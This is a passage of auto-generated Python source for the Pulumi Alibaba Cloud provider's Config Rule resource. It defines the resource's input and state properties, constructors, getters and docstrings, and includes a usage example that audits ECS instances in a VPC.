config_rule_trigger_types: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
exclude_resource_ids_scope: Optional[pulumi.Input[str]] = None,
input_parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None,
maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
region_ids_scope: Optional[pulumi.Input[str]] = None,
resource_group_ids_scope: Optional[pulumi.Input[str]] = None,
resource_types_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
risk_level: Optional[pulumi.Input[int]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
scope_compliance_resource_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_detail_message_type: Optional[pulumi.Input[str]] = None,
source_identifier: Optional[pulumi.Input[str]] = None,
source_maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
source_owner: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tag_key_scope: Optional[pulumi.Input[str]] = None,
tag_value_scope: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Rule resources.
:param pulumi.Input[str] config_rule_trigger_types: The trigger type of the rule. Valid values: `ConfigurationItemChangeNotification`: The rule is triggered upon configuration changes. `ScheduledNotification`: The rule is triggered as scheduled.
:param pulumi.Input[str] description: The description of the Config Rule.
:param pulumi.Input[str] exclude_resource_ids_scope: The rule monitors excluded resource IDs, multiple of which are separated by commas, only applies to rules created based on managed rules, custom rule this field is empty.
:param pulumi.Input[Mapping[str, Any]] input_parameters: Threshold value for managed rule triggering.
:param pulumi.Input[str] maximum_execution_frequency: The frequency of the compliance evaluations, it is required if the ConfigRuleTriggerTypes value is ScheduledNotification. Valid values: `One_Hour`, `Three_Hours`, `Six_Hours`, `Twelve_Hours`, `TwentyFour_Hours`.
:param pulumi.Input[str] region_ids_scope: The rule monitors region IDs, separated by commas, only applies to rules created based on managed rules.
:param pulumi.Input[str] resource_group_ids_scope: The rule monitors resource group IDs, separated by commas, only applies to rules created based on managed rules.
:param pulumi.Input[Sequence[pulumi.Input[str]]] resource_types_scopes: Resource types to be evaluated. [Alibaba Cloud services that support Cloud Config.](https://www.alibabacloud.com/help/en/doc-detail/127411.htm)
:param pulumi.Input[int] risk_level: The risk level of the Config Rule. Valid values: `1`: Critical ,`2`: Warning , `3`: Info.
:param pulumi.Input[str] rule_name: The name of the Config Rule.
:param pulumi.Input[Sequence[pulumi.Input[str]]] scope_compliance_resource_types: Field `scope_compliance_resource_types` has been deprecated from provider version 1.124.1. New field `resource_types_scope` instead.
:param pulumi.Input[str] source_detail_message_type: Field `source_detail_message_type` has been deprecated from provider version 1.124.1. New field `config_rule_trigger_types` instead.
:param pulumi.Input[str] source_identifier: The identifier of the rule. For a managed rule, the value is the name of the managed rule. For a custom rule, the value is the ARN of the custom rule. Using managed rules, refer to [List of Managed rules.](https://www.alibabacloud.com/help/en/doc-detail/127404.htm)
:param pulumi.Input[str] source_maximum_execution_frequency: Field `source_maximum_execution_frequency` has been deprecated from provider version 1.124.1. New field `maximum_execution_frequency` instead.
:param pulumi.Input[str] source_owner: Specifies whether you or Alibaba Cloud owns and manages the rule. Valid values: `CUSTOM_FC`: The rule is a custom rule and you own the rule. `ALIYUN`: The rule is a managed rule and Alibaba Cloud owns the rule.
:param pulumi.Input[str] tag_key_scope: The rule monitors the tag key, only applies to rules created based on managed rules.
:param pulumi.Input[str] tag_value_scope: The rule monitors the tag value, use with the TagKeyScope options. only applies to rules created based on managed rules.
"""
if config_rule_trigger_types is not None:
pulumi.set(__self__, "config_rule_trigger_types", config_rule_trigger_types)
if description is not None:
pulumi.set(__self__, "description", description)
if exclude_resource_ids_scope is not None:
pulumi.set(__self__, "exclude_resource_ids_scope", exclude_resource_ids_scope)
if input_parameters is not None:
pulumi.set(__self__, "input_parameters", input_parameters)
if maximum_execution_frequency is not None:
pulumi.set(__self__, "maximum_execution_frequency", maximum_execution_frequency)
if region_ids_scope is not None:
pulumi.set(__self__, "region_ids_scope", region_ids_scope)
if resource_group_ids_scope is not None:
pulumi.set(__self__, "resource_group_ids_scope", resource_group_ids_scope)
if resource_types_scopes is not None:
pulumi.set(__self__, "resource_types_scopes", resource_types_scopes)
if risk_level is not None:
pulumi.set(__self__, "risk_level", risk_level)
if rule_name is not None:
pulumi.set(__self__, "rule_name", rule_name)
if scope_compliance_resource_types is not None:
warnings.warn("""Field 'scope_compliance_resource_types' has been deprecated from provider version 1.124.1. New field 'resource_types_scope' instead.""", DeprecationWarning)
pulumi.log.warn("""scope_compliance_resource_types is deprecated: Field 'scope_compliance_resource_types' has been deprecated from provider version 1.124.1. New field 'resource_types_scope' instead.""")
if scope_compliance_resource_types is not None:
pulumi.set(__self__, "scope_compliance_resource_types", scope_compliance_resource_types)
if source_detail_message_type is not None:
warnings.warn("""Field 'source_detail_message_type' has been deprecated from provider version 1.124.1. New field 'config_rule_trigger_types' instead.""", DeprecationWarning)
pulumi.log.warn("""source_detail_message_type is deprecated: Field 'source_detail_message_type' has been deprecated from provider version 1.124.1. New field 'config_rule_trigger_types' instead.""")
if source_detail_message_type is not None:
pulumi.set(__self__, "source_detail_message_type", source_detail_message_type)
if source_identifier is not None:
pulumi.set(__self__, "source_identifier", source_identifier)
if source_maximum_execution_frequency is not None:
warnings.warn("""Field 'source_maximum_execution_frequency' has been deprecated from provider version 1.124.1. New field 'maximum_execution_frequency' instead.""", DeprecationWarning)
pulumi.log.warn("""source_maximum_execution_frequency is deprecated: Field 'source_maximum_execution_frequency' has been deprecated from provider version 1.124.1. New field 'maximum_execution_frequency' instead.""")
if source_maximum_execution_frequency is not None:
pulumi.set(__self__, "source_maximum_execution_frequency", source_maximum_execution_frequency)
if source_owner is not None:
pulumi.set(__self__, "source_owner", source_owner)
if status is not None:
pulumi.set(__self__, "status", status)
if tag_key_scope is not None:
pulumi.set(__self__, "tag_key_scope", tag_key_scope)
if tag_value_scope is not None:
pulumi.set(__self__, "tag_value_scope", tag_value_scope)
@property
@pulumi.getter(name="configRuleTriggerTypes")
def config_rule_trigger_types(self) -> Optional[pulumi.Input[str]]:
"""
The trigger type of the rule. Valid values: `ConfigurationItemChangeNotification`: The rule is triggered upon configuration changes. `ScheduledNotification`: The rule is triggered as scheduled.
"""
return pulumi.get(self, "config_rule_trigger_types")
@config_rule_trigger_types.setter
def config_rule_trigger_types(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "config_rule_trigger_types", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the Config Rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="excludeResourceIdsScope")
def exclude_resource_ids_scope(self) -> Optional[pulumi.Input[str]]:
"""
The rule monitors excluded resource IDs, multiple of which are separated by commas, only applies to rules created based on managed rules, custom rule this field is empty.
"""
return pulumi.get(self, "exclude_resource_ids_scope")
@exclude_resource_ids_scope.setter
def exclude_resource_ids_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "exclude_resource_ids_scope", value)
@property
@pulumi.getter(name="inputParameters")
def input_parameters(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Threshold value for managed rule triggering.
"""
return pulumi.get(self, "input_parameters")
@input_parameters.setter
def input_parameters(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "input_parameters", value)
@property
@pulumi.getter(name="maximumExecutionFrequency")
def maximum_execution_frequency(self) -> Optional[pulumi.Input[str]]:
"""
The frequency of the compliance evaluations, it is required if the ConfigRuleTriggerTypes value is ScheduledNotification. Valid values: `One_Hour`, `Three_Hours`, `Six_Hours`, `Twelve_Hours`, `TwentyFour_Hours`.
"""
return pulumi.get(self, "maximum_execution_frequency")
@maximum_execution_frequency.setter
def maximum_execution_frequency(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "maximum_execution_frequency", value)
@property
@pulumi.getter(name="regionIdsScope")
def region_ids_scope(self) -> Optional[pulumi.Input[str]]:
"""
The rule monitors region IDs, separated by commas, only applies to rules created based on managed rules.
"""
return pulumi.get(self, "region_ids_scope")
@region_ids_scope.setter
def region_ids_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region_ids_scope", value)
@property
@pulumi.getter(name="resourceGroupIdsScope")
def resource_group_ids_scope(self) -> Optional[pulumi.Input[str]]:
"""
The rule monitors resource group IDs, separated by commas, only applies to rules created based on managed rules.
"""
return pulumi.get(self, "resource_group_ids_scope")
@resource_group_ids_scope.setter
def resource_group_ids_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_ids_scope", value)
@property
@pulumi.getter(name="resourceTypesScopes")
def resource_types_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Resource types to be evaluated. [Alibaba Cloud services that support Cloud Config.](https://www.alibabacloud.com/help/en/doc-detail/127411.htm)
"""
return pulumi.get(self, "resource_types_scopes")
@resource_types_scopes.setter
def resource_types_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "resource_types_scopes", value)
@property
@pulumi.getter(name="riskLevel")
def risk_level(self) -> Optional[pulumi.Input[int]]:
"""
The risk level of the Config Rule. Valid values: `1`: Critical ,`2`: Warning , `3`: Info.
"""
return pulumi.get(self, "risk_level")
@risk_level.setter
def risk_level(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "risk_level", value)
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Config Rule.
"""
return pulumi.get(self, "rule_name")
@rule_name.setter
def rule_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rule_name", value)
@property
@pulumi.getter(name="scopeComplianceResourceTypes")
def scope_compliance_resource_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Field `scope_compliance_resource_types` has been deprecated from provider version 1.124.1. New field `resource_types_scope` instead.
"""
return pulumi.get(self, "scope_compliance_resource_types")
@scope_compliance_resource_types.setter
def scope_compliance_resource_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "scope_compliance_resource_types", value)
@property
@pulumi.getter(name="sourceDetailMessageType")
def source_detail_message_type(self) -> Optional[pulumi.Input[str]]:
"""
Field `source_detail_message_type` has been deprecated from provider version 1.124.1. New field `config_rule_trigger_types` instead.
"""
return pulumi.get(self, "source_detail_message_type")
@source_detail_message_type.setter
def source_detail_message_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_detail_message_type", value)
@property
@pulumi.getter(name="sourceIdentifier")
def source_identifier(self) -> Optional[pulumi.Input[str]]:
"""
The identifier of the rule. For a managed rule, the value is the name of the managed rule. For a custom rule, the value is the ARN of the custom rule. Using managed rules, refer to [List of Managed rules.](https://www.alibabacloud.com/help/en/doc-detail/127404.htm)
"""
return pulumi.get(self, "source_identifier")
@source_identifier.setter
def source_identifier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_identifier", value)
@property
@pulumi.getter(name="sourceMaximumExecutionFrequency")
def source_maximum_execution_frequency(self) -> Optional[pulumi.Input[str]]:
"""
Field `source_maximum_execution_frequency` has been deprecated from provider version 1.124.1. New field `maximum_execution_frequency` instead.
"""
return pulumi.get(self, "source_maximum_execution_frequency")
@source_maximum_execution_frequency.setter
def source_maximum_execution_frequency(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_maximum_execution_frequency", value)
@property
@pulumi.getter(name="sourceOwner")
def source_owner(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether you or Alibaba Cloud owns and manages the rule. Valid values: `CUSTOM_FC`: The rule is a custom rule and you own the rule. `ALIYUN`: The rule is a managed rule and Alibaba Cloud owns the rule.
"""
return pulumi.get(self, "source_owner")
@source_owner.setter
def source_owner(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_owner", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter(name="tagKeyScope")
def tag_key_scope(self) -> Optional[pulumi.Input[str]]:
"""
The rule monitors the tag key, only applies to rules created based on managed rules.
"""
return pulumi.get(self, "tag_key_scope")
@tag_key_scope.setter
def tag_key_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag_key_scope", value)
@property
@pulumi.getter(name="tagValueScope")
def tag_value_scope(self) -> Optional[pulumi.Input[str]]:
"""
The rule monitors the tag value, use with the TagKeyScope options. only applies to rules created based on managed rules.
"""
return pulumi.get(self, "tag_value_scope")
@tag_value_scope.setter
def tag_value_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag_value_scope", value)
class Rule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
config_rule_trigger_types: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
exclude_resource_ids_scope: Optional[pulumi.Input[str]] = None,
input_parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None,
maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
region_ids_scope: Optional[pulumi.Input[str]] = None,
resource_group_ids_scope: Optional[pulumi.Input[str]] = None,
resource_types_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
risk_level: Optional[pulumi.Input[int]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
scope_compliance_resource_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_detail_message_type: Optional[pulumi.Input[str]] = None,
source_identifier: Optional[pulumi.Input[str]] = None,
source_maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
source_owner: Optional[pulumi.Input[str]] = None,
tag_key_scope: Optional[pulumi.Input[str]] = None,
tag_value_scope: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a a Alicloud Config Rule resource. Cloud Config checks the validity of resources based on rules. You can create rules to evaluate resources as needed.
For information about Alicloud Config Rule and how to use it, see [What is Alicloud Config Rule](https://www.alibabacloud.com/help/en/doc-detail/127388.htm).
> **NOTE:** Available in v1.99.0+.
> **NOTE:** The Cloud Config region only support `cn-shanghai` and `ap-northeast-1`.
> **NOTE:** If you use custom rules, you need to create your own rule functions in advance. Please refer to the link for [Create a custom rule.](https://www.alibabacloud.com/help/en/doc-detail/127405.htm)
## Example Usage
```python
import pulumi
import pulumi_alicloud as alicloud
# Audit ECS instances under VPC using preset rules
example = alicloud.cfg.Rule("example",
config_rule_trigger_types="ConfigurationItemChangeNotification",
description="ecs instances in vpc",
input_parameters={
"vpc_ids": "vpc-uf6gksw4ctjd******",
},
resource_types_scopes=["ACS::ECS::Instance"],
risk_level=1,
rule_name="instances-in-vpc",
source_identifier="ecs-instances-in-vpc",
source_owner="ALIYUN")
```
## Import
Alicloud Config Rule can be imported using the id, e.g.
```sh
$ pulumi import alicloud:cfg/rule:Rule this cr-ed4bad756057********
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] config_rule_trigger_types: The trigger type of the rule. Valid values: `ConfigurationItemChangeNotification`: The rule is triggered upon configuration changes. `ScheduledNotification`: The rule is triggered as scheduled.
:param pulumi.Input[str] description: The description of the Config Rule.
:param pulumi.Input[str] exclude_resource_ids_scope: The rule monitors excluded resource IDs, multiple of which are separated by commas, only applies to rules created based on managed rules, custom rule this field is empty.
:param pulumi.Input[Mapping[str, Any]] input_parameters: Threshold value for managed rule triggering.
:param pulumi.Input[str] maximum_execution_frequency: The frequency of the compliance evaluations, it is required if the ConfigRuleTriggerTypes value is ScheduledNotification. Valid values: `One_Hour`, `Three_Hours`, `Six_Hours`, `Twelve_Hours`, `TwentyFour_Hours`.
:param pulumi.Input[str] region_ids_scope: The rule monitors region IDs, separated by commas, only applies to rules created based on managed rules.
:param pulumi.Input[str] resource_group_ids_scope: The rule monitors resource group IDs, separated by commas, only applies to rules created based on managed rules.
:param pulumi.Input[Sequence[pulumi.Input[str]]] resource_types_scopes: Resource types to be evaluated. [Alibaba Cloud services that support Cloud Config.](https://www.alibabacloud.com/help/en/doc-detail/127411.htm)
:param pulumi.Input[int] risk_level: The risk level of the Config Rule. Valid values: `1`: Critical ,`2`: Warning , `3`: Info.
:param pulumi.Input[str] rule_name: The name of the Config Rule.
:param pulumi.Input[Sequence[pulumi.Input[str]]] scope_compliance_resource_types: Field `scope_compliance_resource_types` has been deprecated from provider version 1.124.1. New field `resource_types_scope` instead.
:param pulumi.Input[str] source_detail_message_type: Field `source_detail_message_type` has been deprecated from provider version 1.124.1. New field `config_rule_trigger_types` instead.
:param pulumi.Input[str] source_identifier: The identifier of the rule. For a managed rule, the value is the name of the managed rule. For a custom rule, the value is the ARN of the custom rule. Using managed rules, refer to [List of Managed rules.](https://www.alibabacloud.com/help/en/doc-detail/127404.htm)
:param pulumi.Input[str] source_maximum_execution_frequency: Field `source_maximum_execution_frequency` has been deprecated from provider version 1.124.1. New field `maximum_execution_frequency` instead.
:param pulumi.Input[str] source_owner: Specifies whether you or Alibaba Cloud owns and manages the rule. Valid values: `CUSTOM_FC`: The rule is a custom rule and you own the rule. `ALIYUN`: The rule is a managed rule and Alibaba Cloud owns the rule.
:param pulumi.Input[str] tag_key_scope: The rule monitors the tag key, only applies to rules created based on managed rules.
:param pulumi.Input[str] tag_value_scope: The rule monitors the tag value, use with the TagKeyScope options. only applies to rules created based on managed rules.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a a Alicloud Config Rule resource. Cloud Config checks the validity of resources based on rules. You can create rules to evaluate resources as needed.
For information about Alicloud Config Rule and how to use it, see [What is Alicloud Config Rule](https://www.alibabacloud.com/help/en/doc-detail/127388.htm).
> **NOTE:** Available in v1.99.0+.
> **NOTE:** The Cloud Config region only support `cn-shanghai` and `ap-northeast-1`.
> **NOTE:** If you use custom rules, you need to create your own rule functions in advance. Please refer to the link for [Create a custom rule.](https://www.alibabacloud.com/help/en/doc-detail/127405.htm)
## Example Usage
```python
import pulumi
import pulumi_alicloud as alicloud
# Audit ECS instances under VPC using preset rules
example = alicloud.cfg.Rule("example",
config_rule_trigger_types="ConfigurationItemChangeNotification",
description="ecs instances in vpc",
input_parameters={
"vpc_ids": "vpc-uf6gksw4ctjd******",
},
resource_types_scopes=["ACS::ECS::Instance"],
risk_level=1,
rule_name="instances-in-vpc",
source_identifier="ecs-instances-in-vpc",
source_owner="ALIYUN")
```
## Import
Alicloud Config Rule can be imported using the id, e.g.
```sh
$ pulumi import alicloud:cfg/rule:Rule this cr-ed4bad756057********
```
:param str resource_name: The name of the resource.
:param RuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
config_rule_trigger_types: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
exclude_resource_ids_scope: Optional[pulumi.Input[str]] = None,
input_parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None,
maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
region_ids_scope: Optional[pulumi.Input[str]] = None,
resource_group_ids_scope: Optional[pulumi.Input[str]] = None,
resource_types_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
risk_level: Optional[pulumi.Input[int]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
scope_compliance_resource_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_detail_message_type: Optional[pulumi.Input[str]] = None,
source_identifier: Optional[pulumi.Input[str]] = None,
source_maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
source_owner: Optional[pulumi.Input[str]] = None,
tag_key_scope: Optional[pulumi.Input[str]] = None,
tag_value_scope: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RuleArgs.__new__(RuleArgs)
__props__.__dict__["config_rule_trigger_types"] = config_rule_trigger_types
__props__.__dict__["description"] = description
__props__.__dict__["exclude_resource_ids_scope"] = exclude_resource_ids_scope
__props__.__dict__["input_parameters"] = input_parameters
__props__.__dict__["maximum_execution_frequency"] = maximum_execution_frequency
__props__.__dict__["region_ids_scope"] = region_ids_scope
__props__.__dict__["resource_group_ids_scope"] = resource_group_ids_scope
__props__.__dict__["resource_types_scopes"] = resource_types_scopes
if risk_level is None and not opts.urn:
raise TypeError("Missing required property 'risk_level'")
__props__.__dict__["risk_level"] = risk_level
if rule_name is None and not opts.urn:
raise TypeError("Missing required property 'rule_name'")
__props__.__dict__["rule_name"] = rule_name
if scope_compliance_resource_types is not None and not opts.urn:
warnings.warn("""Field 'scope_compliance_resource_types' has been deprecated from provider version 1.124.1. New field 'resource_types_scope' instead.""", DeprecationWarning)
pulumi.log.warn("""scope_compliance_resource_types is deprecated: Field 'scope_compliance_resource_types' has been deprecated from provider version 1.124.1. New field 'resource_types_scope' instead.""")
__props__.__dict__["scope_compliance_resource_types"] = scope_compliance_resource_types
if source_detail_message_type is not None and not opts.urn:
warnings.warn("""Field 'source_detail_message_type' has been deprecated from provider version 1.124.1. New field 'config_rule_trigger_types' instead.""", DeprecationWarning)
pulumi.log.warn("""source_detail_message_type is deprecated: Field 'source_detail_message_type' has been deprecated from provider version 1.124.1. New field 'config_rule_trigger_types' instead.""")
__props__.__dict__["source_detail_message_type"] = source_detail_message_type
if source_identifier is None and not opts.urn:
raise TypeError("Missing required property 'source_identifier'")
__props__.__dict__["source_identifier"] = source_identifier
if source_maximum_execution_frequency is not None and not opts.urn:
warnings.warn("""Field 'source_maximum_execution_frequency' has been deprecated from provider version 1.124.1. New field 'maximum_execution_frequency' instead.""", DeprecationWarning)
pulumi.log.warn("""source_maximum_execution_frequency is deprecated: Field 'source_maximum_execution_frequency' has been deprecated from provider version 1.124.1. New field 'maximum_execution_frequency' instead.""")
__props__.__dict__["source_maximum_execution_frequency"] = source_maximum_execution_frequency
if source_owner is None and not opts.urn:
raise TypeError("Missing required property 'source_owner'")
__props__.__dict__["source_owner"] = source_owner
__props__.__dict__["tag_key_scope"] = tag_key_scope
__props__.__dict__["tag_value_scope"] = tag_value_scope
__props__.__dict__["status"] = None
super(Rule, __self__).__init__(
'alicloud:cfg/rule:Rule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
config_rule_trigger_types: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
exclude_resource_ids_scope: Optional[pulumi.Input[str]] = None,
input_parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None,
maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
region_ids_scope: Optional[pulumi.Input[str]] = None,
resource_group_ids_scope: Optional[pulumi.Input[str]] = None,
resource_types_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
risk_level: Optional[pulumi.Input[int]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
scope_compliance_resource_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_detail_message_type: Optional[pulumi.Input[str]] = None,
source_identifier: Optional[pulumi.Input[str]] = None,
source_maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
source_owner: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tag_key_scope: Optional[pulumi.Input[str]] = None,
tag_value_scope: Optional[pulumi.Input[str]] = None) -> 'Rule':
"""
Get an existing Rule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] config_rule_trigger_types: The trigger type of the rule. Valid values: `ConfigurationItemChangeNotification`: The rule is triggered upon configuration changes. `ScheduledNotification`: The rule is triggered as scheduled.
:param pulumi.Input[str] description: The description of the Config Rule.
:param pulumi.Input[str] exclude_resource_ids_scope: The rule monitors excluded resource IDs, multiple of which are separated by commas, only applies to rules created based on managed rules, custom rule this field is empty.
:param pulumi.Input[Mapping[str, Any]] input_parameters: Threshold value for managed rule triggering.
:param pulumi.Input[str] maximum_execution_frequency: The frequency of the compliance evaluations, it is required if the ConfigRuleTriggerTypes value is ScheduledNotification. Valid values: `One_Hour`, `Three_Hours`, `Six_Hours`, `Twelve_Hours`, `TwentyFour_Hours`.
:param pulumi.Input[str] region_ids_scope: The rule monitors region IDs, separated by commas, only applies to rules created based on managed rules.
:param pulumi.Input[str] resource_group_ids_scope: The rule monitors resource group IDs, separated by commas, only applies to rules created based on managed rules.
:param pulumi.Input[Sequence[pulumi.Input[str]]] resource_types_scopes: Resource types to be evaluated. [Alibaba Cloud services that support Cloud Config.](https://www.alibabacloud.com/help/en/doc-detail/127411.htm)
:param pulumi.Input[int] risk_level: The risk level of the Config Rule. Valid values: `1`: Critical ,`2`: Warning , `3`: Info.
:param pulumi.Input[str] rule_name: The name of the Config Rule.
:param pulumi.Input[Sequence[pulumi.Input[str]]] scope_compliance_resource_types: Field `scope_compliance_resource_types` has been deprecated from provider version 1.124.1. New field `resource_types_scope` instead.
:param pulumi.Input[str] source_detail_message_type: Field `source_detail_message_type` has been deprecated from provider version 1.124.1. New field `config_rule_trigger_types` instead.
:param pulumi.Input[str] source_identifier: The identifier of the rule. For a managed rule, the value is the name of the managed rule. For a custom rule, the value is the ARN of the custom rule. Using managed rules, refer to [List of Managed rules.](https://www.alibabacloud.com/help/en/doc-detail/127404.htm)
:param pulumi.Input[str] source_maximum_execution_frequency: Field `source_maximum_execution_frequency` has been deprecated from provider version 1.124.1. New field `maximum_execution_frequency` instead.
:param pulumi.Input[str] source_owner: Specifies whether you or Alibaba Cloud owns and manages the rule. Valid values: `CUSTOM_FC`: The rule is a custom rule and you own the rule. `ALIYUN`: The rule is a managed rule and Alibaba Cloud owns the rule.
:param pulumi.Input[str] tag_key_scope: The rule monitors the tag key, only applies to rules created based on managed rules.
:param pulumi.Input[str] tag_value_scope: The rule monitors the tag value, use with the TagKeyScope options. only applies to rules created based on managed rules.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RuleState.__new__(_RuleState)
__props__.__dict__["config_rule_trigger_types"] = config_rule_trigger_types
__props__.__dict__["description"] = description
__props__.__dict__["exclude_resource_ids_scope"] = exclude_resource_ids_scope
__props__.__dict__["input_parameters"] = input_parameters
__props__.__dict__["maximum_execution_frequency"] = maximum_execution_frequency
__props__.__dict__["region_ids_scope"] = region_ids_scope
__props__.__dict__["resource_group_ids_scope"] = resource_group_ids_scope
__props__.__dict__["resource_types_scopes"] = resource_types_scopes
__props__.__dict__["risk_level"] = risk_level
__props__.__dict__["rule_name"] = rule_name
__props__.__dict__["scope_compliance_resource_types"] = scope_compliance_resource_types
__props__.__dict__["source_detail_message_type"] = source_detail_message_type
__props__.__dict__["source_identifier"] = source_identifier
__props__.__dict__["source_maximum_execution_frequency"] = source_maximum_execution_frequency
__props__.__dict__["source_owner"] = source_owner
__props__.__dict__["status"] = status
__props__.__dict__["tag_key_scope"] = tag_key_scope
__props__.__dict__["tag_value_scope"] = tag_value_scope
return Rule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="configRuleTriggerTypes")
def config_rule_trigger_types(self) -> pulumi.Output[str]:
"""
The trigger type of the rule. Valid values: `ConfigurationItemChangeNotification`: The rule is triggered upon configuration changes. `ScheduledNotification`: The rule is triggered as scheduled.
"""
return pulumi.get(self, "config_rule_trigger_types")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of the Config Rule.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="excludeResourceIdsScope")
def exclude_resource_ids_scope(self) -> pulumi.Output[Optional[str]]:
"""
The rule monitors excluded resource IDs, multiple of which are separated by commas, only applies to rules created based on managed rules, custom rule this field is empty.
"""
return pulumi.get(self, "exclude_resource_ids_scope")
@property
@pulumi.getter(name="inputParameters")
def input_parameters(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
Threshold value for managed rule triggering.
"""
return pulumi.get(self, "input_parameters")
@property
@pulumi.getter(name="maximumExecutionFrequency")
def maximum_execution_frequency(self) -> pulumi.Output[str]:
"""
The frequency of the compliance evaluations, it is required if the ConfigRuleTriggerTypes value is ScheduledNotification. Valid values: `One_Hour`, `Three_Hours`, `Six_Hours`, `Twelve_Hours`, `TwentyFour_Hours`.
"""
return pulumi.get(self, "maximum_execution_frequency")
@property
@pulumi.getter(name="regionIdsScope")
def region_ids_scope(self) -> pulumi.Output[Optional[str]]:
"""
The rule monitors region IDs, separated by commas, only applies to rules created based on managed rules.
"""
return pulumi.get(self, "region_ids_scope")
@property
@pulumi.getter(name="resourceGroupIdsScope")
def resource_group_ids_scope(self) -> pulumi.Output[Optional[str]]:
"""
The rule monitors resource group IDs, separated by commas, only applies to rules created based on managed rules.
